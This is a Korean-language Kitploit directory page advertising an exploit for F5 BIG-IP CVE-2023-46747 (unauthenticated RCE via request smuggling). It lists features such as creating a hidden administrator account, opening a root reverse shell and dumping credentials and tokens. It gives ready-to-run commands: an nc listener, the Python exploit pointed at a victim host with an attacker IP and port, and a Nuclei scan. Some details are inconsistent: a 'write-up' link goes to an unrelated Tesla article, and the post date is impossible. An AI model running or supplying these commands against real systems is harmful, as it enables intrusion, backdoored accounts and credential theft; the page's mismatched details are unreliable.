Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – 인증되지 않은 RCE Python 익스플로잇 & Nuclei 템플릿 (Raguraman 제작) ✓ 자동화된 TCP 리버스 셸 (LHOST/LPORT) ✓ 영향받는 BIG-IP 13.x–17.x에서 테스트됨 ⚠️ 승인된 침투 테스트에만 사용 | Kitploit
도구/GitHubGitHub/razzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – 인증되지 않은 RCE Python 익스플로잇 & Nuclei 템플릿 (Raguraman 제작) ✓ 자동화된 TCP 리버스 셸 (LHOST/LPORT) ✓ 영향받는 BIG-IP 13.x–17.x에서 테스트됨 ⚠️ 승인된 침투 테스트에만 사용

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
419개월 전아직 검토되지 않음

F5 BIG-IP CVE-2023-46747 – 인증되지 않은 RCE + 리버스 셸

Python3 및 Nuclei 버전 – raguraman 제작

치명적인 인증 없는 RCE(CVSS 9.8) - AJP + HTTP 요청 스머글링을 통한 공격
패치되지 않은 모든 BIG-IP 13.x → 17.x(최신 17.1.0.3 포함)에서 동작
패치: https://my.f5.com/manage/s/article/K000137353 (2023년 11월)

실제 익스플로잇 분석 글: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

기능

  • 완전 자동화 (수동 단계 없음)
  • 도메인 이름 또는 원시 IP 모두 지원
  • 숨겨진 관리자 사용자 생성
  • 즉시 TCP 리버스 셸 (root)
  • 자격 증명 및 토큰을 포함한 깔끔한 출력

파일

  • f5-bigip-cve-2023-46747-revshell.py → 독립형 Python3 (권장)
  • CVE-2023-46747-revshell.yaml → Nuclei 템플릿 (선택 사항)

사용법 – Python3 (가장 빠르고 안정적)

root@kitploit:~
# 1. Start your listener
nc -lvnp 4444

# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444

# → Instant root shell!

사용법 – Nuclei 템플릿 (대안) Bash # 1. YAML 파일 내부의 LHOST 및 LPORT를 편집하세요

2. 리스너 시작

nc -lvnp 4444

3. 스캔

nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com

법적 경고

이 도구는 승인된 보안 테스트 용도로만 제공됩니다. 예:

승인된 침투 테스트 계약

서면 허가를 받은 레드 팀 운영

통제된 실험실 환경에서의 연구

소유하지 않았거나 테스트에 대한 명시적 허가가 없는 시스템에서 이 익스플로잇을 사용하지 마십시오. 무단 악용은 불법이며 형사 기소로 이어질 수 있습니다.

이 도구를 사용함으로써 귀하는 관련 법률 준수에 대한 모든 책임을 수락합니다. 저자는 어떠한 오용이나 손해에 대해서도 책임을 지지 않습니다.

도구 다운로드